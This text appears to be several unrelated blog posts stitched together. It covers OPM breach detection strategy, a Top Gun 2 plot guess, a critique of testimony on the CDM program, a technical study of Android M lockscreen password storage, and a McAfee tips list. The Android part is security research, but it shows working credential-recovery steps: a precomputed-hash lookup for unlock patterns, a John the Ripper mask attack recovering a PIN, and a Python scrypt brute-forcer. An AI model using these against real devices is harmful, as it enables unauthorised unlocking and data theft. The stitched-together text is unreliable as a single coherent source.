My Security Strategy: The “Third Way”

Over the last two weeks I listened to and watched all of the hearings related to the OPM breach. During the exchanges between the witnesses and legislators, I noticed several themes. One presented the situation facing OPM (and other Federal agencies) as confronting the following choice:

You can either 1) “secure your network,” which is very difficult and going to “take years,” due to “years of insufficient investment,” or 2) suffer intrusions and breaches, which is what happened to OPM.

This struck me as an odd dichotomy. The reasoning appeared to be that because OPM did not make “sufficient investment” in security, a breach was the result.

In other words, if OPM had “sufficiently invested” in security, they would not have suffered a breach.

I do not see the situation in this way, for two main reasons.

First, there is a difference between an “intrusion” and a “breach.” An intrusion is unauthorized access to a computing resource. A breach is the theft, alteration, or destruction of that computing resource, following an intrusion.

It therefore follows that one can suffer an intrusion, but not suffer a breach.

One can avoid a breach following an intrusion if the security team can stop the adversary before he accomplishes his mission.

Second, there is no point at which any network is “secure,” i.e., intrusion-proof. It is more likely one could operate a breach-proof network, but that is not completely attainable, either.

Still, the most effective strategy is a combination of preventing as many intrusions as possible, complemented by an aggressive detection and response operation that improves the chances of avoiding a breach, or at least minimizes the impact of a breach.

This is why I call “detection and response” the “third way” strategy. The first way, “secure your network” by making it “intrusion-proof,” is not possible. The second way, suffer intrusions and breaches, is not acceptable. Therefore, organizations should implement a third way strategy that stops as many intrusions as possible, but detects and responds to those intrusions that do occur, prior to their progression to breach status.

My Prediction for Top Gun 2 Plot

We’ve known for about a year that Tom Cruise is returning to his iconic “Maverick” role from Top Gun, and that drone warfare would be involved. A few days ago we heard a few more details in this Collider story:

[Producer David Ellison]: There is an amazing role for Maverick in the movie and there is no Top Gun without Maverick, and it is going to be Maverick playing Maverick. It is I don’t think what people are going to expect, and we are very, very hopeful that we get to make the movie very soon. But like all things, it all comes down to the script, and Justin is writing as we speak.

[Interviewer]: You’re gonna do what a lot of sequels have been doing now which is incorporate real use of time from the first one to now.

ELLISON and DANA GOLDBERG: Absolutely…

ELLISON:  As everyone knows with Tom, he is 100% going to want to be in those airplanes shooting it practically. When you look at the world of dogfighting, what’s interesting about it is that it’s not a world that exists to the same degree when the original movie came out. This world has not been explored. It is very much a world we live in today where it’s drone technology and fifth generation fighters are really what the United States Navy is calling the last man-made fighter that we’re actually going to produce so it’s really exploring the end of an era of dogfighting and fighter pilots and what that culture is today are all fun things that we’re gonna get to dive into in this movie.

What could the plot involve?

First, who is the adversary? You can’t have dogfighting without a foe. Consider the leading candidates:

  • Russia: Maybe. Nobody is fond of what President Putin is doing in Ukraine.
  • Iran: Possible, but Hollywood types are close to the Democrats, and they will not likely want to upset Iran if Secretary Kerry secures a nuclear deal.
  • China: No way. Studios want to release movies in China, and despite the possibility of aerial conflict in the East or South China Seas, no studio is going to make China the bad guy. In fact, the studio will want to promote China as a good guy to please that audience.
  • North Korea: No way. Prior to “The Interview,” this was a possibility. Not anymore!
My money is on an Islamic terrorist group, either unnamed, or possibly Islamic State. They don’t have an air force, you say? This is where the drone angle comes into play.

Here is my prediction for the Top Gun 2 plot.

Oil tankers are trying to pass through the Gulf of Aden, or maybe the Strait of Hormuz, carrying their precious cargo. Suddenly a swarm of small, yet armed, drones attack and destroy the convoy, setting the oil ablaze in a commercial and environmental disaster. The stock market suffers a huge drop and gas prices skyrocket.

The US Fifth Fleet, and its Chinese counterpart, performing counter-piracy duties nearby, rush to rescue the survivors. They set up joint patrols to guard other commercial sea traffic. Later the Islamic group sends another swarm of drones to attack the American and Chinese ships. This time the enemy includes some sort of electronic warfare-capable drones that jam US and Chinese GPS, communications, and computer equipment. (I’m seeing a modern “Battlestar Galactica” theme here.) American and Chinese pilots die, and their ships are heavily damaged. (By the way, this is Hollywood, not real life.)

The US Navy realizes that its “net-centric,” “technologically superior” force can’t compete with this new era of warfare. Cue the similarities with the pre-Fighter Weapons School, early Vietnam situation described in the first scenes at Miramar in the original movie. (Remember, a 12-1 kill ratio in Korea, 3-1 in early Vietnam due to reliance on missiles and atrophied dogfighting skills, back to 12-1 in Vietnam after Top Gun training?)

The US Navy decides it needs to bring back someone who thinks unconventionally in order to counter the drone threat and resume commercial traffic in the Gulf. They find Maverick, barely hanging on to a job teaching at a civilian flight school. His personal life is a mess, and he was kicked out of the Navy during the first Gulf War in 1991 for breaking too many rules. Now the Navy wants him to teach a new generation of pilots how to fight once their “net-centric crutches” disappear.

You know what happens next. Maverick returns to the Navy as a contractor. Top Gun is now the Naval Strike and Air Warfare Center (NSAWC) at NAS Fallon, Nevada. The Navy retired his beloved F-14 in 2006, so there is a choice to be made about what aircraft awaits him in Nevada. I see three possibilities:

1) The Navy resurrects the F-14 because it’s “not vulnerable” to the drone electronic warfare. This would be cool, but they aren’t going to be able to fly American F-14s due to their retirement. CGI maybe?

2) The Navy flies the new F-35, because it’s new and cool. However, the Navy will probably not have any to fly. CGI again?

3) The Navy flies the F-18. This is most likely, because producers could film live operations as they did in the 1980s.

Beyond the aircraft issues, I expect themes involving relevance as one ages, re-integration with military culture, and possibly friction between members of the joint US-China task force created to counter the Islamic threat.

In the end, thanks to the ingenuity of Maverick’s teaching and tactics, the Americans and Chinese prevail over the Islamic forces. It might require Maverick to make the ultimate sacrifice, showing he’s learned that warfare is a team sport, and that he really misses Goose. The Chinese name their next aircraft carrier the “Pete Mitchell” in honor of Maverick’s sacrifice. (Forget calling it the “Maverick” — too much rebellion for the CCP.)

I’m looking forward to this movie.

Hearing Witness Doesn’t Understand CDM

This post is a follow-up to my earlier post on CDM. Since that post I have been watching hearings on the OPM breach.

On Wednesday 24 June a Subcommittee of the House Committee on Homeland Security held a hearing titled DHS’ Efforts to Secure .Gov.

A second panel (starts in the Webcast around 2 hours 20 minutes) featured Dr. Daniel M. Gerstein, a former DHS official now with RAND, as its sole witness.

During his opening statement, and in his written testimony, he made the following comments:

“The two foundational programs of DHS’s cybersecurity program are EINSTEIN (also called EINSTEIN 3A) and CDM. These two systems are designed to work in tandem, with EINSTEIN focusing on keeping threats out of federal networks and CDM identifying them when they are inside government networks.

EINSTEIN provides a perimeter around federal (or .gov) users, as well as select users in the .com space that have responsibility for critical infrastructure. EINSTEIN functions by installing sensors at Web access points and employs signatures to identify cyberattacks.

CDM, on the other hand, is designed to provide an embedded system of sensors on internal government networks. These sensors provide real-time capacity to sense anomalous behavior and provide reports to administrators through a scalable dashboard. It is composed of commercial-off-the-shelf equipment coupled with a customized dashboard that can be scaled for administrators at each level.” (emphasis added)

All of the text in bold is false. CDM is not “identifying [threats] when they are inside government networks.” CDM is not “an embedded system of sensors on internal government networks” looking for threat actors.

Why does Dr. Gerstein so misunderstand the CDM program? The answer is found in the next section of his testimony, reproduced below.

“CDM operates by providing

          federal departments and agencies with capabilities and tools that identify
          cybersecurity risks on an ongoing basis, prioritize these risks based upon
          potential impacts, and enable cybersecurity personnel to mitigate the
          most significant problems first. Congress established the CDM program
          to provide adequate, risk-based, and cost-effective cybersecurity and
          more efficiently allocate cybersecurity resources.” (emphasis added)

The indented section is reproduced from the DHS CDM Website, as footnoted in Dr. Gerstein’s statement.

The answer to my question of misunderstanding involves two levels of confusion.

The first level of confusion is a result of the CDM description, which confuses risks with vulnerabilities. Basically, the CDM description should say vulnerabilities instead of risks. CDM, now known as Continuous Diagnostics and Mitigation, is a “find and fix flaws (i.e., vulnerabilities) faster” program.

In other words, the CDM description should say:

“CDM provides federal departments and agencies with capabilities and tools that identify cybersecurity vulnerabilities on an ongoing basis, prioritize these vulnerabilities based upon potential impacts, and enable cybersecurity personnel to mitigate the most significant problems first.”

The second level of confusion is a result of Dr. Gerstein confusing risks with threats. It is clear that when Dr. Gerstein reads the CDM description and its mention of “risks,” he thinks CDM is looking for threat actors. CDM does not look for threat actors; CDM looks for vulnerabilities. Vulnerabilities are flaws in software or configuration that make it possible for intruders to gain unauthorized access.

As I wrote in my CDM post, we absolutely need the capability to find and fix flaws faster. We need CDM. However, do not confuse CDM with the operational capability to detect and remove threat actors. CDM could be deployed across the entire Federal government, but it would be an accident if a security analyst noticed an intruder using a CDM tool.

Essentially, the government needs to implement My Federal Government Security Crash Program to detect and remove threat actors.

It is critical that staffers, lawmakers, and the public understand what is happening, and not be lulled into a false sense of security due to misunderstanding these concepts.

Password storage in Android M

While Android has received a number of security enhancements in the last few releases, the lockscreen (also known as the keyguard) and password storage have remained virtually unchanged since the 2.x days, save for adding multi-user support. Android M is finally changing this with official support for fingerprint authentication. While the code related to biometric support is currently unavailable, some of the new code responsible for password storage and user authentication is partially available in AOSP’s master branch. Examining the runtime behaviour and files used by the current Android M preview reveals that some password storage changes have already been deployed. This post will briefly review how password storage has been implemented in pre-M Android versions, and then introduce the changes brought about by Android M.

Keyguard unlock methods

Stock Android provides three keyguard unlock methods: pattern, PIN and password (Face Unlock has been rebranded to ‘Trusted face’ and moved to the proprietary Smart Lock extension, part of Google Play Services). The pattern unlock is the original Android unlock method, while PIN and password (which are essentially equivalent under the hood) were added in version 2.2. The following sections will discuss how credentials are registered, stored and verified for the pattern and PIN/password unlock methods.

Pattern unlock

Android’s pattern unlock is entered by joining at least four points on a 3×3 matrix (some custom ROMs allow a bigger matrix). Each point can be used only once (crossed points are disregarded) and the maximum number of points is nine. The pattern is internally converted to a byte sequence, with each point represented by its index, where 0 is top left and 8 is bottom right. Thus the pattern is similar to a PIN with a minimum of four and maximum of nine digits which uses only nine distinct digits (0 to 8). However, because points cannot be repeated, the number of variations in an unlock pattern is considerably lower than that of a nine-digit PIN. As pattern unlock is the original and initially sole unlock method supported by Android, a fair amount of research has been done about its (in)security. It has been shown that patterns can be guessed quite reliably using the so-called smudge attack, and that the total number of possible combinations is less than 400 thousand, with only 1624 combinations for 4-dot (the default) patterns.
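The combination counts above are easy to check by enumeration. Here is a Python 3 sketch, assuming the standard rule that a stroke may not jump over an unvisited point (already-visited points may be crossed):

```python
# Count valid unlock patterns on the 3x3 grid (points indexed 0-8).
# Rule: a stroke from a to b may not jump over an unvisited point;
# already-visited points may be crossed.
SKIP = {}
for a, b, mid in [(0, 2, 1), (3, 5, 4), (6, 8, 7),   # horizontal lines
                  (0, 6, 3), (1, 7, 4), (2, 8, 5),   # vertical lines
                  (0, 8, 4), (2, 6, 4)]:             # diagonals
    SKIP[(a, b)] = SKIP[(b, a)] = mid

def count_patterns(path, visited, per_length):
    if len(path) >= 4:
        per_length[len(path)] = per_length.get(len(path), 0) + 1
    for nxt in range(9):
        if nxt in visited:
            continue
        mid = SKIP.get((path[-1], nxt))
        if mid is not None and mid not in visited:
            continue  # stroke would jump over an unvisited point
        count_patterns(path + [nxt], visited | {nxt}, per_length)

per_length = {}
for start in range(9):
    count_patterns([start], {start}, per_length)

print(per_length[4])             # 1624 four-point patterns
print(sum(per_length.values()))  # 389112 patterns in total
```

Running this confirms the numbers: 1624 four-point patterns, and 389,112 patterns overall.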

Android stores an unsalted SHA-1 hash of the unlock pattern in /data/system/gesture.key or /data/system/users/<user ID>/gesture.key on multi-user devices. For example, for a ‘Z’ pattern (joining points 0, 1, 2, 4, 6, 7 and 8), it may look like this:

$ od -tx1 gesture.key
0000000 6a 06 2b 9b 34 52 e3 66 40 71 81 a1 bf 92 ea 73
0000020 e9 ed 4c 48

Because the hash is unsalted, it is easy to precompute the hashes of all possible combinations and recover the original pattern instantaneously. As the number of combinations is fairly small, no special indexing or file format optimizations are required for the hash table, and the grep and xxd commands are all you need to recover the pattern once you have the gesture.key file.

$ grep `xxd -p gesture.key` pattern_hashes.txt
00010204060708, 6a062b9b3452e366407181a1bf92ea73e9ed4c48
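The pattern_hashes.txt table used above can be generated in a few lines. Here is a Python 3 sketch (pattern_sha1 and build_table are hypothetical helper names); it hashes every permutation of 4 to 9 points, which is a superset of the patterns actually reachable on screen, but that is harmless for lookup purposes:

```python
import hashlib
from itertools import permutations

def pattern_sha1(points):
    # gesture.key holds the unsalted SHA-1 of the raw point indexes
    return hashlib.sha1(bytes(points)).hexdigest()

def build_table(path='pattern_hashes.txt'):
    # One line per candidate pattern: hex-encoded indexes, then the hash
    with open(path, 'w') as out:
        for length in range(4, 10):
            for points in permutations(range(9), length):
                hexpattern = ''.join('%02x' % p for p in points)
                out.write('%s, %s\n' % (hexpattern, pattern_sha1(points)))

# The 'Z' pattern from the example above:
print(pattern_sha1((0, 1, 2, 4, 6, 7, 8)))
```

Generating the full table takes only a few seconds, since there are fewer than a million permutations to hash.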

PIN/password unlock

The PIN/password unlock method also relies on a stored hash of the user’s credential; however, it also uses a 64-bit random, per-user salt. The salt is stored in the locksettings.db SQLite database, along with other settings related to the lockscreen. The password hash is kept in the /data/system/password.key file, which contains a concatenation of the password’s SHA-1 and MD5 hash values. The file’s contents may look like this:

$ cat password.key && echo
2E704465DB8C3CBFF085D8A5135A6F3CA32D5A2CA4A628AE48E22443250C30A3E1449BD0
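For reference, the file’s contents can be reproduced roughly as follows. This is a Python 3 sketch based on my reading of AOSP’s LockPatternUtils.passwordToHash(), which appends the salt to the password as the lowercase hex string produced by Java’s Long.toHexString() and concatenates the uppercase SHA-1 and MD5 digests:

```python
import hashlib

def password_to_hash(password, salt):
    # salt: the signed 64-bit value stored in locksettings.db, rendered
    # as unsigned lowercase hex, the way Java's Long.toHexString does it
    salt_str = format(salt & 0xFFFFFFFFFFFFFFFF, 'x')
    salted = (password + salt_str).encode()
    sha1 = hashlib.sha1(salted).hexdigest().upper()
    md5 = hashlib.md5(salted).hexdigest().upper()
    return sha1 + md5  # 40 + 32 = 72 hex characters, as in password.key

print(len(password_to_hash('123456', 0x327d5ce3f570d2eb)))  # 72
```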

Note that the hashes are not nested, but their values are simply concatenated, so if you were to bruteforce the password, you only need to attack the weaker hash — MD5. Another helpful fact is that in order to enable password auditing, Android stores details about the current PIN/password’s format in the device_policies.xml file, which might look like this:

<policies setup-complete="true">
...
<active-password length="6" letters="0" lowercase="0" nonletter="6"
numeric="6" quality="196608" symbols="0" uppercase="0">
</active-password>
</policies>

If you were able to obtain the password.key file, chances are that you would also have the device_policies.xml file. This file gives you enough information to narrow down the search space considerably when recovering the password by specifying a mask or password rules. For example, we can easily recover the following 6-digit PIN using John the Ripper (JtR) in about a second by specifying the ?d?d?d?d?d?d mask and using the ‘dynamic’ MD5 hash format (hashcat has a dedicated Android PIN hash mode), as shown below. An 8-character, lower-case-only password (?l?l?l?l?l?l?l?l) takes a couple of hours on the same hardware.

$ cat lockscreen.txt
user:$dynamic_1$A4A628AE48E22443250C30A3E1449BD0$327d5ce3f570d2eb

$ ./john --mask=?d?d?d?d?d?d lockscreen.txt
Loaded 1 password hash (dynamic_1 [md5($p.$s) (joomla) 128/128 AVX 480x4x3])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
456987 (user)
1g 0:00:00:00 DONE 6.250g/s 4953Kp/s 4953Kc/s 4953KC/s 234687..575297
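Building the lockscreen.txt input line from password.key and the salt is mechanical: the last 32 hex characters of password.key are the MD5 hash, and the salt field is the 64-bit salt rendered as a lowercase hex string. A Python 3 sketch (to_jtr_line is a hypothetical helper):

```python
def to_jtr_line(password_key_hex, salt, user='user'):
    md5_part = password_key_hex[40:]  # last 32 chars: the MD5 hash
    # Java's Long.toHexString: unsigned, lowercase, no zero padding
    salt_str = format(salt & 0xFFFFFFFFFFFFFFFF, 'x')
    # dynamic_1 is JtR's md5($p.$s) format
    return '%s:$dynamic_1$%s$%s' % (user, md5_part, salt_str)

key = ('2E704465DB8C3CBFF085D8A5135A6F3C'
       'A32D5A2CA4A628AE48E22443250C30A3E1449BD0')
print(to_jtr_line(key, 0x327d5ce3f570d2eb))
# user:$dynamic_1$A4A628AE48E22443250C30A3E1449BD0$327d5ce3f570d2eb
```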

Android’s lockscreen password can be easily reset by simply deleting the gesture.key and password.key files, so you might be wondering what the point of trying to bruteforce it is. As discussed in previous posts, the lockscreen password is used to derive keys that protect the keystore (if not hardware-backed), VPN profile passwords, backups, as well as the disk encryption key, so it might be valuable when trying to extract data from any of these services. And of course, the chance that a particular user is using the same pattern, PIN or password on all of their devices is quite high.

Gatekeeper password storage

We briefly introduced Android M’s gatekeeper daemon in the keystore redesign post in relation to per-key authorization tokens. It turns out the gatekeeper does much more than that and is also responsible for registering (called ‘enrolling’) and verifying user passwords. Enrolling turns a plaintext password into a so-called ‘password handle’, which is an opaque, implementation-dependent byte string. The password handle can then be stored on disk and used to check whether a user-supplied password matches the currently registered handle. While the gatekeeper HAL does not specify the format of password handles, the default software implementation uses the following format:

typedef uint64_t secure_id_t;
typedef uint64_t salt_t;

static const uint8_t HANDLE_VERSION = 2;
struct __attribute__ ((__packed__)) password_handle_t {
    // fields included in signature
    uint8_t version;
    secure_id_t user_id;
    uint64_t flags;

    // fields not included in signature
    salt_t salt;
    uint8_t signature[32];

    bool hardware_backed;
};

Here secure_id_t is a randomly generated, 64-bit secure user ID, which is persisted in the /data/misc/gatekeeper directory in a file named after the user’s Android user ID (*not* Linux UID; 0 for the primary user). The signature format is left to the implementation, but AOSP’s commit log reveals that it is most probably scrypt for the current default implementation. Other gatekeeper implementations might opt to use a hardware-protected symmetric or asymmetric key to produce a ‘real’ signature (or HMAC).

Neither the HAL, nor the currently available AOSP source code specifies where password handles are to be stored, but looking through the /data/system directory reveals the following files, one of which happens to be the same size as the password_handle_t structure. This implies that it likely contains a serialized password_handle_t instance.

# ls -l /data/system/*key
-rw------- system system 57 2015-06-24 10:24 gatekeeper.gesture.key
-rw------- system system 0 2015-06-24 10:24 gatekeeper.password.key

That’s quite a few assumptions though, so it is time to verify them by parsing the gatekeeper.gesture.key file and checking whether the signature field matches the scrypt value of our lockscreen pattern (00010204060708 in binary representation). We can do so with the following Python code:

$ cat m-pass-hash.py
#!/usr/bin/env python
import binascii
import struct

import scrypt

N = 16384
r = 8
p = 1

f = open('gatekeeper.gesture.key', 'rb')
blob = f.read()

# version (1 byte) + secure user ID (8 bytes) + flags (8 bytes) = 17 bytes,
# followed by the 8-byte salt and the 32-byte signature
s = struct.Struct('<17s 8s 32s')
(meta, salt, signature) = s.unpack_from(blob)
password = binascii.unhexlify('00010204060708')
to_hash = meta + password
hash = scrypt.hash(to_hash, salt, N, r, p)

print 'signature: %s' % signature.encode('hex')
print 'Hash: %s' % hash[0:32].encode('hex')
print 'Equal: %s' % (hash[0:32] == signature)

$ ./m-pass-hash.py
signature: 3d1a20985dec4bd937e5040aadb465fc75542c71f617ad090ca1c0f96950a4b8
Hash: 3d1a20985dec4bd937e5040aadb465fc75542c71f617ad090ca1c0f96950a4b8
Equal: True

The program output above leads us to believe that the ‘signature’ stored in the password handle file is indeed the scrypt value of the blob’s version, the 64-bit secure user ID, and the blob’s flags field, concatenated with the plaintext pattern value. The scrypt hash value is calculated using the stored 64-bit salt and the scrypt parameters N=16384, r=8, p=1. Password handles for PINs or passwords are calculated in the same way, using the PIN/password string value as input.

With this new hashing scheme, patterns and passwords are treated in the same way, and thus patterns are no longer easier to bruteforce. That said, with the help of the device_policies.xml file, which gives us the length of the pattern, and a pre-computed pattern table, one can drastically reduce the number of patterns to try, as most users are likely to use 4-6 step patterns (about 35,000 total combinations).

Because Android M’s password hashing scheme doesn’t directly use the plaintext password when calculating the scrypt value, optimized password recovery tools such as hashcat or JtR cannot be used directly to evaluate bruteforce cost. It is however fairly easy to build our own tool in order to check how a simple PIN holds up against a brute force attack, assuming both the device_policies.xml and gatekeeper.password.key files have been obtained. As can be seen below, a simple Python script that tries all PINs from 0000 to 9999 in order takes about 10 minutes, when run on the same hardware as our previous JtR example (a 6-digit PIN would take about 17 hours with the same program). Compare this to less than a second for bruteforcing a 6-digit PIN for Android 5.1 (and earlier), and it is pretty obvious that the new hashing scheme Android M introduces greatly improves password storage security, even for simple PINs. Of course, as we mentioned earlier, the gatekeeper daemon is part of Android’s HAL, so vendors are free to employ even more (or less…) secure gatekeeper implementations.
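A minimal version of such a brute-forcer might look like the following Python 3 sketch, which uses hashlib.scrypt in place of the scrypt package and assumes the same handle layout as before:

```python
import hashlib
import itertools
import struct

N, r, p = 16384, 8, 1  # scrypt parameters used by the default gatekeeper

def signature_of(meta, password, salt):
    # scrypt over the handle metadata (version, secure user ID, flags)
    # concatenated with the plaintext credential
    return hashlib.scrypt(meta + password, salt=salt, n=N, r=r, p=p, dklen=32)

def crack_pin(handle_blob, digits):
    # 17-byte metadata, 8-byte salt, 32-byte signature
    meta, salt, signature = struct.unpack_from('<17s 8s 32s', handle_blob)
    for candidate in itertools.product('0123456789', repeat=digits):
        pin = ''.join(candidate).encode()
        if signature_of(meta, pin, salt) == signature:
            return pin.decode()
    return None
```

Each scrypt call with these parameters takes tens of milliseconds on typical desktop hardware, which is exactly what stretches a 4-digit search into minutes.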

$ time ./m-pass-hash.py gatekeeper.password.key 4
Trying 0000...
Trying 0001...
Trying 0002...

...
Trying 9997...
Trying 9998...
Trying 9999...
Found PIN: 9999

real 9m46.118s
user 9m6.804s
sys 0m39.107s

Framework API

Android M is still in preview, so framework APIs are hardly stable, but we’ll show the gatekeeper’s AIDL interface for completeness. In the current preview release it is called IGateKeeperService and looks like this:

interface android.service.gatekeeper.IGateKeeperService {

    void clearSecureUserId(int uid);

    byte[] enroll(int uid, byte[] currentPasswordHandle,
            byte[] currentPassword, byte[] desiredPassword);

    long getSecureUserId(int uid);

    boolean verify(int uid, byte[] enrolledPasswordHandle, byte[] providedPassword);

    byte[] verifyChallenge(int uid, long challenge,
            byte[] enrolledPasswordHandle, byte[] providedPassword);
}

As you can see, the interface provides methods for generating/getting and clearing the secure user ID for a particular user, as well as the enroll(), verify() and verifyChallenge() methods whose parameters closely match the lower level HAL interface. To verify that there is a live service that implements this interface, we can try to call the getSecureUserId() method using the service command line utility like so:

$ service call android.service.gatekeeper.IGateKeeperService 4 i32 0
Result: Parcel(00000000 ee555c25 ea679e08 '....%U...g.')

This returns a Binder Parcel with the primary user’s (user ID 0) secure user ID, which matches the value stored in /data/misc/gatekeeper/0 shown below (stored in network byte order).

# od -tx1 /data/misc/gatekeeper/0
37777776644 25 5c 55 ee 08 9e 67 ea
37777776644

The actual storage of password hashes (handles) is carried out by the LockSettingsService (interface ILockSettings), as in previous versions. The service has been extended to support the new gatekeeper password handle format, as well as to migrate legacy hashes to the new format. It is easy to verify this by calling the checkPassword(String password, int userId) method which returns true if the password matches:

# service call lock_settings 11 s16 1234 i32 0
Result: Parcel(00000000 00000000 '........')
# service call lock_settings 11 s16 9999 i32 0
Result: Parcel(00000000 00000001 '........')

Summary

Android M introduces a new system service — gatekeeper, which is responsible for converting plaintext passwords to opaque binary blobs (called password handles) which can be safely stored on disk. The gatekeeper is part of Android’s HAL, so it can be modified to take advantage of the device’s native security features, such as secure storage or TEE, without modifying the core platform. The default implementation shipped with the current Android M preview release uses scrypt to hash unlock patterns, PINs or passwords, and provides much better protection against bruteforcing than the previously used single-round MD5 and SHA-1 hashes.

Minimize Risk with These 5 Android Security Tips

Have you ever watched the show ‘MythBusters’? Each week, the show’s hosts band together to get to the bottom of questions such as: ‘Is running better than walking to keep dry in the rain?’

Today, we’re going to follow suit and bust some myths of our own – each one pertaining to Android security, of course!

Whether it’s the latest mobile malware development or a new mobile security flaw, the security landscape is ever-changing. It’s time to take matters into your own hands and protect yourself by following these tips:

  1. Never ‘root’ your Android devices

While it can be tempting to ‘root’ your Android device, a process that allows you to access the entire operating system and customize anything on your Android, you never should. Doing this makes your mobile phone a bigger target, since it’s easier for malware to act on devices with administrator level access.

  2. Don’t focus exclusively on malware

A number of Android risks, such as misplaced usernames and passwords or poor use of encryption, are overlooked by traditional malware-only security strategies. Additionally, bad apps can mine your personal data or gain access to your phone functions. McAfee® Mobile Security is free for both Android and iOS, and offers a variety of protections to keep unwanted people and apps out of your devices.

  3. Stick to official app stores for all your mobile needs

Want to download a new app or update the software on your mobile device? Do it from an official app store. Third-party app stores are breeding grounds for malicious apps and faulty software that could wreak havoc on your mobile device.

  4. Keep a close eye on mobile app permissions

Are your mobile apps requesting more than they need to operate on a basic level? They shouldn’t be! Always think twice before downloading an app that unjustifiably requests access to things like SMS messaging, your contacts or location services.

  5. Update your Android software and firmware regularly

Make it a habit to consistently check on available software updates for your Android device. The newer the version, the better chance you have at keeping hackers out of your mobile device.

There you have it – Android mobile security myths busted and facts laid out in one place. Now, it’s up to you to follow them!

To keep up with the latest security threats, make sure to follow @IntelSec_Home on Twitter and like us on Facebook.

Lianne Caetano